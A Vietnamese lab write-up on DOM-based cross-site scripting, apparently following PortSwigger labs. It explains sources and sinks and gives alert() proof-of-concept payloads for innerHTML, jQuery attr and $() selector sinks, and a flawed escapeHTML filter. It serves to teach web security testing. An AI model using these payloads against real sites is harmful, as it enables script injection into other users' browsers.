Xảy ra khi code JavaScript ở phía client lấy dữ liệu từ một nguồn mà attacker có thể kiểm soát được chẳng hạn như URL và truyền vào một “sink” (lỗ thoát) mà được dùng để thực thi mã tự động chẳng hạn như eval() hoặc innerHTML.
Attacker sẽ gửi URL có chứa mã độc cho người dùng để họ gửi request tương tự với reflected XSS.
Minh họa:
How to Test for DOM-based Cross-site Scripting
Để test DOM XSS trong trường hợp payload được chèn vào HTML thì ta cần gửi một chuỗi ngẫu nhiên gồm chữ cái và số vào một entry point và dùng developer tools của trình duyệt để xem chuỗi đó được chèn vào đâu ở trong HTML.
Trong trường hợp payload được truyền vào một hàm JavaScript để thực thi thì ta cần dùng debugger của trình duyệt để xem payload được xử lý như thế nào.
Khi có được vị trí chèn dữ liệu thì ta sẽ xem xét đến các ngữ cảnh xung quanh. Ví dụ, nếu chuỗi truyền vào được bọc ở trong một cặp nháy đơn thì ta cần dùng cặp nháy kép trong payload để thoát ra khỏi cặp nháy đơn đó.
Attention
Các trình duyệt chẳng hạn như Chrome, Firefox, và Safari sẽ URL encode giá trị của location.search (query string) hoặc location.hash (fragment). Trong khi đó, IE và Edge lại không URL encode các giá trị này. Nếu payload của chúng ta bị URL encode thì sẽ không thực hiện được DOM XSS attack.
Tip
Trình duyệt của Burp có extension giúp tìm và khai thác các lỗ hổng DOM XSS dễ dàng hơn.
Exploiting DOM XSS with Different Sources and Sinks
Sink document.write có thể hoạt động với các thẻ <script> nên ta có thể xây dựng payload như sau:
Nếu dùng query param storeId thì nội dung của nó sẽ được chèn vào một thẻ <option selected>. Ví dụ, nếu storeId=Paris thì HTML sinh ra từ script sẽ là:
Lab: DOM XSS in innerHTML Sink Using Source location.search
Sink innerHTML không chấp nhận element <script> nên ta cần dùng các element khác chẳng hạn như <img> hoặc <iframe> kết hợp với các sự kiện onload và onerror. Ví dụ:
Lab này tồn tại lỗ hổng DOM-XSS ở chức năng tìm kiếm blog. Nó sử dụng innerHTML để thay đổi nội dung HTML của một thẻ <span> với dữ liệu lấy từ location.search.
<script> function doSearchQuery(query) { document.getElementById('searchMessage').innerHTML = query; } var query = (new URLSearchParams(window.location.search)).get('search'); if(query) { doSearchQuery(query); }</script>
Chuỗi hello trong query param search sẽ được chèn vào thẻ <span> có id là searchMessage như sau:
<span id="searchMessage">hello</span>
Dùng payload sau cho query param search:
<img src=1 onerror=alert(1)>
Khai thác thành công.
Sources and Sinks in Third-party Dependencies
Các sink và source từ các thư viện của bên thứ ba cũng có thể dùng để tấn công DOM-XSS.
Lab: DOM XSS in jQuery Anchor href Attribute Sink Using location.search Source
Nếu dữ liệu được đọc từ một nguồn mà user có thể kiểm soát chẳng hạn như URL rồi được truyền vào trong hàm thay đổi DOM element (chẳng hạn như hàm attr() của jQuery giúp thay đổi thuộc tính của element) thì ta có thể triển khai DOM-XSS attack. Ví dụ, xét đoạn script sau:
Chúng ta có thể truyền vào query param returnUrl payload như sau:
?returnUrl=javascript:alert(document.domain)
Khi đó, bất cứ khi nào người dùng click vào link có ID là #backLink thì payload sẽ được thực thi.
Info
Cú pháp javascript:<script> là để chạy script thông qua URL. Cụ thể, nếu ta gõ javascript:alert(1) vào URL của trình duyệt thì sẽ có hộp thoại hiện ra. Lưu ý là không thể thực hiện copy và paste chuỗi này để thực thi.
Lab này có lỗ hổng trong DOM-XSS trong chức năng submit feedback.
<script> $(function() { $('#backLink').attr("href", (new URLSearchParams(window.location.search)).get('returnPath')); });</script>
Dùng payload sau cho query param returnPath:
javascript:alert(1)
Lab: DOM XSS in jQuery Selector Sink Using a hashchange Event
Attacker cũng có thể tấn công DOM-XSS thông qua hàm $() của jQuery kết hợp với giá trị của location.hash. Cụ thể, ngoài truy vấn element thì hàm $() còn có thể tạo element nếu đối số đầu tiên truyền vào có chứa một chuỗi trông giống như code HTML (có thể có các prefix hoặc suffix xung quanh). Ví dụ:
$("<img src=1 onerror=alert(1)>")
Trong đoạn code trên, jQuery sẽ cố gắng tạo ra một element <img>. Mà do thuộc tính src của thẻ <img> xảy ra lỗi nên script trong attribute onerror sẽ được thực thi.
Ví dụ, đoạn code bên dưới được dùng để cuộn trang đến vị trí của element tương ứng khi fragment trong URL thay đổi.
$(window).on('hashchange', function() { var element = $(location.hash); element[0].scrollIntoView();});
Dễ thấy, để tấn công DOM-XSS, attacker sẽ chèn payload vào fragment của URL như sau:
/#<img src=1 onerror=alert(1)/>
Tuy nhiên, attacker cần trigger được sự kiện hashchange thì client-side script mới chạy payload. Để làm được điều này, attacker sẽ sử dụng một cross-site request có thuộc tính onload giúp thay đổi fragment như sau:
Dữ liệu của user có trong response (reflected XSS) có thể được chèn vào DOM bởi client-side script. Điều này khiến cho reflected XSS có thể được dùng để khai thác DOM XSS. Ví dụ:
HTTP/2 200 OKContent-Type: application/json; charset=utf-8X-Frame-Options: SAMEORIGINContent-Length: 736[ { "avatar": "", "website": "", "date": "2024-03-18T20:00:17.199Z", "body": "I got Siri to read your blog and it lost some of its charm, I thought the same when I had her read my wedding toast.", "author": "Nat Itoode" }, { "avatar": "", "website": "", "date": "2024-03-19T23:24:58.459Z", "body": "My best friend Steve ran off with my wife yesterday. Well, he's only been my best friend since yesterday.", "author": "Ivor Lemon" }, { "avatar": "", "website": "", "date": "2024-04-08T12:02:41.618Z", "body": "I lost my daughter's Harry Potter book so I had to read her your blog. May I suggest you write about more magical themes in the future?", "author": "Cindy Music" }, { "avatar": "", "website": "", "date": "2024-04-15T03:25:24.811095379Z", "body": "hello", "author": "hello" }]
Trong hàm loadComments có hàm escapeHTML dùng để filter ký tự < và >:
function loadComments(postCommentPath) { // ... function escapeHTML(html) { return html.replace('<', '<').replace('>', '>'); } // ...}
Tìm được một chỗ mà có sử dụng hàm escapeHTML trước khi gán cho innerHTML:
function loadComments(postCommentPath) { // ... function displayComments(comments) { let userComments = document.getElementById("user-comments"); for (let i = 0; i < comments.length; ++i) { comment = comments[i]; // ... if (comment.body) { let commentBodyPElement = document.createElement("p"); commentBodyPElement.innerHTML = escapeHTML(comment.body); // ... } // ... } }}
Kiểm tra tài liệu về hàm replace của kiểu String trong JavaScript thì thấy nó chỉ replace 1 lần duy nhất nếu đối số đầu tiên là kiểu chuỗi:
const paragraph = "I think Ruth's dog is cuter Ruth's your dog!";console.log(paragraph.replace("Ruth's", 'my')); // "I think my dog is cuter Ruth's your dog!"
Xây dựng payload như sau:
<><script>alert(1)</script>
Tuy nhiên, ký tự / bị escape trong kết quả trả về của endpoint /post/comment:
